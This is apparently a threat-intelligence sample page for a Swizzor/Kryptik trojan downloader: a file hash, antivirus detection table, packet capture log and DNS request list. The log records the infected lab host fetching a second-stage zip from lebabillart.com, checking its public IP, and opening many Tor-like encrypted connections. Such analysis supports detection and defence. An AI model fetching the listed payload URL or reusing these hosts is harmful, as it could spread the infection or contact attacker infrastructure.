Swizzor Malware Trojan Downloader Dropper r6.php?cmd=e PCAP file Download Traffic Analysis Sample

Download Attachments

  • pcap r6
    Date added: July 6, 2017 2:15 am. Added by: admin. File size: 1 MB.
SHA256: e94e398e06ea23be9866db444773c1ca16edb0e6042e51878442a4991c17cf4b
File name: r6.exe
Detection ratio: 19 / 62
Analysis date: 2017-07-06 02:12:20 UTC

Engine                   Detection                                    Update
AegisLab                 Mal.Swizzor.Gen!c                            20170706
Baidu                    Win32.Trojan.WisdomEyes.16070401.9500.9997   20170705
CrowdStrike Falcon (ML)  malicious_confidence_100% (W)                20170420
Endgame                  malicious (high confidence)                  20170629
ESET-NOD32               a variant of Win32/Kryptik.FUEK              20170705
Invincea                 heuristic                                    20170607
Kaspersky                UDS:DangerousObject.Multi.Generic            20170705
McAfee                   Artemis!081AC2E55C35                         20170706
McAfee-GW-Edition        BehavesLike.Win32.Dropper.gh                 20170705
Qihoo-360                HEUR/QVM10.1.4A81.Malware.Gen                20170706
Rising                   Trojan.Kryptik!8.8 (cloud:qqKhnl05I8F)       20170706
SentinelOne (Static ML)  static engine – malicious                    20170516
Sophos                   Mal/Gozi-C                                   20170705
Symantec                 ML.Attribute.HighConfidence                  20170705
Tencent                  Win32.Trojan.Swizzor.Dla                     20170706
TrendMicro               Mal_Swizzor                                  20170706
TrendMicro-HouseCall     Mal_Swizzor                                  20170706

2017-07-05 16:38:45.795048 IP 192.168.1.102.50327 > 192.168.1.100.55555: Flags [P.], seq 1:438, ack 1, win 2053, length 437
GET /r6.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Referer: http://192.168.1.100:55555/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: 192.168.1.100:55555
Connection: Keep-Alive

2017-07-05 16:38:45.795076 IP 192.168.1.100.55555 > 192.168.1.102.50327: Flags [.], ack 438, win 237, length 0
2017-07-05 16:38:45.795363 IP 192.168.1.100.55555 > 192.168.1.102.50327: Flags [.], seq 1:5841, ack 438, win 237, length 5840
HTTP/1.1 200 OK
Date: Wed, 05 Jul 2017 20:38:45 GMT
Server: Apache/2.4.18 (Debian)
Last-Modified: Wed, 05 Jul 2017 20:19:12 GMT
ETag: "79000-55397b6a51939"
Accept-Ranges: bytes
Content-Length: 495616
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program

2017-07-05 16:40:46.672264 IP 192.168.1.102.50328 > 50.87.37.56.80: Flags [P.], seq 2021661667:2021661880, ack 1680714260, win 256, length 213: HTTP: GET /modules/pm/class/Hdkfk.zip HTTP/1.1
GET /modules/pm/class/Hdkfk.zip HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:51.0) Gecko/20100101 Firefox/51.0
Host: lebabillart.com


2017-07-05 16:41:46.995591 IP 192.168.1.102.50415 > 37.48.122.26.80: Flags [P.], seq 3572951193:3572951377, ack 3206900573, win 256, length 184: HTTP: GET / HTTP/1.1
GET / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:51.0) Gecko/20100101 Firefox/51.0
Host: curlmyip.net

2017-07-05 16:40:53.778871 IP 192.168.1.102.50329 > 171.25.193.9.80: Flags [P.], seq 1028276613:1028276858, ack 2829810775, win 256, length 245: HTTP
[binary payload omitted; TLS SNI: www.r4qr7kaimymhqpkeohxqwk6ma.com]
2017-07-05 16:40:53.929880 IP 192.168.1.102.50329 > 171.25.193.9.80: Flags [P.], seq 245:379, ack 1011, win 252, length 134: HTTP
[binary payload omitted; TLS SNI: www.btpv.com]
2017-07-05 16:40:59.807137 IP 192.168.1.102.50330 > 208.83.223.34.80: Flags [P.], seq 224:358, ack 755, win 253, length 134: HTTP
2017-07-05 16:40:59.912870 IP 192.168.1.102.50330 > 208.83.223.34.80: Flags [P.], seq 358:432, ack 814, win 253, length 74: HTTP

[binary payload omitted; TLS SNI: www.vsgg3.com]
2017-07-05 16:41:01.272209 IP 192.168.1.102.50344 > 89.166.109.22.9001: Flags [P.], seq 3688677451:3688677696, ack 2907826683, win 256, length 245
[binary payload omitted; TLS SNI: www.3bf6dju2v7wvcd2tdwc7xuyjz.com]
2017-07-05 16:41:01.272587 IP 192.168.1.102.50345 > 91.121.230.214.443: Flags [P.], seq 590545619:590545845, ack 2885913782, win 256, length 226
[binary payload omitted; TLS SNI: www.z6trd5.com]
2017-07-05 16:41:01.272960 IP 192.168.1.102.50346 > 79.172.193.32.443: Flags [P.], seq 3271176865:3271177105, ack 393248132, win 256, length 240
[binary payload omitted; TLS SNI: www.ti5cggc3w6fh6qkggygt.com]
2017-07-05 16:41:01.273351 IP 192.168.1.102.50347 > 144.76.91.135.9001: Flags [P.], seq 4092234089:4092234329, ack 1379166419, win 256, length 240
[binary payload omitted; TLS SNI: www.oi44tlwdjouche27j6uk.com]
2017-07-05 16:41:01.273760 IP 192.168.1.102.50348 > 193.11.114.45.9002: Flags [P.], seq 32464236:32464468, ack 1167986777, win 256, length 232
[binary payload omitted; TLS SNI: www.jfn2xgmrvbtv.com]

2017-07-05 16:41:01.275969 IP 192.168.1.102.50354 > 91.134.139.215.9001: Flags [P.], seq 3057837041:3057837274, ack 656463986, win 256, length 233
[binary payload omitted; TLS SNI: www.kw3lbndwebwz3.com]
2017-07-05 16:41:01.276371 IP 192.168.1.102.50355 > 159.203.32.149.443: Flags [P.], seq 3989707829:3989708070, ack 851698541, win 256, length 241
[binary payload omitted; TLS SNI: www.tb3xh2ild426zjbyax5ml.com]
2017-07-05 16:41:01.276729 IP 192.168.1.102.50356 > 138.201.247.2.61001: Flags [P.], seq 1140788138:1140788371, ack 498199005, win 256, length 233
[binary payload omitted; TLS SNI: www.vsn57bxc3mb2o.com]
2017-07-05 16:41:01.277127 IP 192.168.1.102.50331 > 84.245.27.209.9001: Flags [P.], seq 1708854068:1708854308, ack 2197240829, win 256, length 240
[binary payload omitted; TLS SNI: www.6jedagsxg3mrdwiddka7.com]
2017-07-05 16:41:01.277578 IP 192.168.1.102.50332 > 213.32.66.192.443: Flags [P.], seq 3813650108:3813650348, ack 2006550589, win 256, length 240
[binary payload omitted; TLS SNI: www.ihinmgwvwlruzfro7o44.com]
2017-07-05 16:41:01.277964 IP 192.168.1.102.50333 > 78.46.51.124.443: Flags [P.], seq 3319424194:3319424434, ack 3060906392, win 256, length 240
[binary payload omitted; TLS SNI: www.evtxd72nmocj47moklbg.com]
2017-07-05 16:41:01.278632 IP 192.168.1.102.50334 > 83.168.200.204.80: Flags [P.], seq 2944603737:2944603981, ack 689799960, win 256, length 244: HTTP
[binary payload omitted; TLS SNI: www.irygrdulouqccdt2bf27xymd.com]
2017-07-05 16:41:01.279174 IP 192.168.1.102.50335 > 51.141.50.145.9001: Flags [P.], seq 1410216554:1410216799, ack 244719982, win 258, length 245
[binary payload omitted; TLS SNI: www.aak45gn42iiiixiph5ekrkj7j.com]
2017-07-05 16:41:01.279566 IP 192.168.1.102.50336 > 78.47.18.110.80: Flags [P.], seq 3503629744:3503629982, ack 1339106153, win 256, length 238: HTTP
[binary payload omitted; TLS SNI: www.6di5z3rikdmc6fzplr.com]
2017-07-05 16:41:01.279935 IP 192.168.1.102.50337 > 94.100.6.27.443: Flags [P.], seq 399576572:399576812, ack 3647675222, win 260, length 240
[binary payload omitted; TLS SNI: www.642l5nfdken6ng6khuvd.com]
2017-07-05 16:41:01.280372 IP 192.168.1.102.50338 > 37.235.55.83.443: Flags [P.], seq 1010240698:1010240936, ack 667920148, win 260, length 238
[binary payload omitted; TLS SNI: www.2yc2podezduls5a2hc.com]

2017-07-05 16:41:01.318500 IP 192.168.1.102.50341 > 62.78.245.129.9001: Flags [P.], seq 2340612092:2340612331, ack 167635855, win 256, length 239
[binary payload omitted; TLS SNI: www.7gb7wwcxdddw2y72xka.com]
2017-07-05 16:41:01.318813 IP 192.168.1.102.50342 > 46.41.130.68.443: Flags [P.], seq 2491986743:2491986984, ack 1654762805, win 256, length 241
[binary payload omitted; TLS SNI: www.5deqfvyuplq76nmo5kygv.com]
2017-07-05 16:41:01.319307 IP 192.168.1.102.50358 > 138.197.133.81.443: Flags [P.], seq 841677261:841677487, ack 4217093403, win 256, length 226
[binary payload omitted; TLS SNI: www.3qkvdr.com]
2017-07-05 16:41:01.334877 IP 192.168.1.102.50360 > 212.47.239.163.12001: Flags [P.], seq 3227276382:3227276607, ack 3713232475, win 256, length 225
[binary payload omitted; TLS SNI: www.nw6ah.com]
2017-07-05 16:41:01.349150 IP 192.168.1.102.50357 > 89.16.176.158.9001: Flags [P.], seq 1969936195:1969936430, ack 66593790, win 256, length 235
[binary payload omitted; TLS SNI: www.6rg6elubllem6ie.com]
2017-07-05 16:41:01.349597 IP 192.168.1.102.50361 > 147.135.210.101.443: Flags [P.], seq 894183362:894183591, ack 38755765, win 256, length 229
[binary payload omitted; TLS SNI: www.tzlpgwndi.com]
2017-07-05 16:41:01.368468 IP 192.168.1.102.50350 > 158.69.92.127.443: Flags [P.], seq 225:359, ack 749, win 253, length 134
[binary payload omitted; TLS SNI: www.nuhwpyyd6nfnkq3v5uy.com]
2017-07-05 16:41:01.374806 IP 192.168.1.102.50359 > 195.16.89.145.938: Flags [P.], seq 1471468849:1471469074, ack 3395312164, win 256, length 225
[binary payload omitted; TLS SNI: www.a7vt5.com]
2017-07-05 16:41:01.399201 IP 192.168.1.102.50354 > 91.134.139.215.9001: Flags [P.], seq 233:367, ack 750, win 253, length 134
2017-07-05 16:41:01.404277 IP 192.168.1.102.50345 > 91.121.230.214.443: Flags [P.], seq 226:360, ack 1007, win 252, length 134

[binary payload omitted; TLS SNI: www.h3ahgcxy6qbyhzkao.com]
2017-07-05 16:41:01.806750 IP 192.168.1.102.50357 > 89.16.176.158.9001: Flags [P.], seq 443:1029, ack 2331, win 256, length 586
[binary payload omitted; TLS SNI: www.exzjuqdla2zuht.com]
2017-07-05 16:41:01.839503 IP 192.168.1.102.50332 > 213.32.66.192.443: Flags [P.], seq 1034:1620, ack 2380, win 256, length 586
[binary payload omitted; TLS SNI: www.qj5nowel4s7gpeeh.com]
2017-07-05 16:41:01.863714 IP 192.168.1.102.50362 > 89.163.128.59.443: Flags [P.], seq 447:1033, ack 2350, win 256, length 586
2017-07-05 16:41:01.869640 IP 192.168.1.102.50331 > 84.245.27.209.9001: Flags [P.], seq 1034:1620, ack 2358, win 256, length 586

[binary payload omitted; TLS SNI: www.qmkzzyzjz.com]
2017-07-05 16:41:02.068335 IP 192.168.1.102.50367 > 88.198.148.255.443: Flags [P.], seq 3425834539:3425834780, ack 2791446585, win 256, length 241
[binary payload omitted; TLS SNI: www.qkeo5fjh7odaex53nrzo7.com]
2017-07-05 16:41:02.068537 IP 192.168.1.102.50365 > 144.217.87.78.9001: Flags [P.], seq 1617:2203, ack 2967, win 254, length 586
[binary payload omitted; TLS SNI: www.oshw5kihq7h6m.com]
2017-07-05 16:41:02.302916 IP 192.168.1.102.50369 > 5.39.33.176.9001: Flags [P.], seq 1333368373:1333368606, ack 523297106, win 256, length 233
[binary payload omitted; TLS SNI: www.2ivry2rhlsedt.com]
2017-07-05 16:41:02.302932 IP 192.168.1.102.50377 > 208.80.154.39.9002: Flags [P.], seq 3909397981:3909398212, ack 1235496428, win 256, length 231
[binary payload omitted; TLS SNI: www.g34wync2gay.com]
2017-07-05 16:41:02.302936 IP 192.168.1.102.50374 > 88.99.68.246.9001: Flags [P.], seq 2809581064:2809581295, ack 3172681866, win 256, length 231
[binary payload omitted; TLS SNI: www.24wsxlew22o.com]
2017-07-05 16:41:02.302941 IP 192.168.1.102.50376 > 212.47.245.76.9001: Flags [P.], seq 3503728016:3503728254, ack 3139782477, win 256, length 238
[binary payload omitted; TLS SNI: www.fres4kxhkdbq4zkuon.com]
2017-07-05 16:41:02.302947 IP 192.168.1.102.50370 > 185.73.220.8.443: Flags [P.], seq 2951769582:2951769824, ack 2938571099, win 260, length 242
[binary payload omitted; TLS SNI: www.nlxzuet4sn2w4e4hj4xufw.com]
2017-07-05 16:41:02.302951 IP 192.168.1.102.50373 > 179.43.168.166.443: Flags [P.], seq 1204194106:1204194345, ack 3572972556, win 260, length 239
[binary payload omitted; TLS SNI: www.sjoqaev4ide4zrf2hap.com]
2017-07-05 16:41:02.302954 IP 192.168.1.102.50371 > 80.238.122.106.9001: Flags [P.], seq 1823198598:1823198825, ack 679601301, win 256, length 227
[binary payload omitted; TLS SNI: www.smqzyif.com]
2017-07-05 16:41:02.302991 IP 192.168.1.102.50375 > 178.62.66.18.9001: Flags [P.], seq 3599510712:3599510955, ack 2206526366, win 256, length 243
[binary payload omitted; TLS SNI: www.uje4qre7zeih6zxcnmpehhq.com]
2017-07-05 16:41:02.302995 IP 192.168.1.102.50372 > 185.14.28.216.22: Flags [P.], seq 420702787:420703027, ack 2486638856, win 256, length 240
[binary payload omitted; TLS SNI: www.aftox7fcxtwy5vfx3m7c.com]
2017-07-05 16:41:02.303000 IP 192.168.1.102.50335 > 51.141.50.145.9001: Flags [P.], seq 6967:7553, ack 31517, win 256, length 586
[binary payload omitted; TLS SNI: www.x76fxmp6synvp4olcnf.com]
2017-07-05 16:41:02.345468 IP 192.168.1.102.50331 > 84.245.27.209.9001: Flags [P.], seq 12156:12742, ack 42950, win 256, length 586
[binary payload omitted; TLS SNI: www.qmkzzyzjz.com]

========================= DNS REQUESTS =================================

2017-07-05 16:40:46.246003 IP 192.168.1.102.53471 > 75.75.75.75.53: 3090+ A? lebabillart.com. (33)
2017-07-05 16:41:46.683380 IP 192.168.1.102.53472 > 75.75.75.75.53: 44790+ A? resolver1.opendns.com. (39)
2017-07-05 16:41:46.740625 IP 192.168.1.102.53473 > 75.75.75.75.53: 5628+ A? curlmyip.net. (30)
2017-07-05 16:41:46.790071 IP 192.168.1.102.53474 > 208.67.222.222.53: 1+ PTR? 222.222.67.208.in-addr.arpa. (45)
2017-07-05 16:41:46.830077 IP 192.168.1.102.53475 > 208.67.222.222.53: 2+ A? myip.opendns.com.localdomain. (46)
2017-07-05 16:41:46.860243 IP 192.168.1.102.53476 > 208.67.222.222.53: 3+ AAAA? myip.opendns.com.localdomain. (46)
2017-07-05 16:41:46.898746 IP 192.168.1.102.53477 > 208.67.222.222.53: 4+ A? myip.opendns.com. (34)
2017-07-05 16:41:46.940960 IP 192.168.1.102.53478 > 208.67.222.222.53: 5+ AAAA? myip.opendns.com. (34)
2017-07-05 16:41:59.775454 IP 192.168.1.102.65176 > 75.75.75.75.53: 29311+ A? ipcast1.dynupdate.noip.com. (44)
2017-07-05 16:42:14.298395 IP 192.168.1.102.53348 > 75.75.75.75.53: 54941+ A? client.wns.windows.com. (40)
2017-07-05 16:42:14.316391 IP 192.168.1.102.53348 > 75.75.76.76.53: 54941+ A? client.wns.windows.com. (40)
2017-07-05 16:42:14.576805 IP 192.168.1.102.61411 > 75.75.75.75.53: 10302+ A? BN4SCH101122406.wns.windows.com. (49)
2017-07-05 16:43:23.899661 IP 192.168.1.102.61412 > 75.75.75.75.53: 54931+ A? dns.msftncsi.com. (34)
2017-07-05 16:43:23.916411 IP 192.168.1.102.61413 > 75.75.75.75.53: 2211+ AAAA? dns.msftncsi.com. (34)
2017-07-05 16:45:02.659817 IP 192.168.1.102.59548 > 75.75.75.75.53: 8336+ A? evoke-windowsservices-tas.msedge.net. (54)
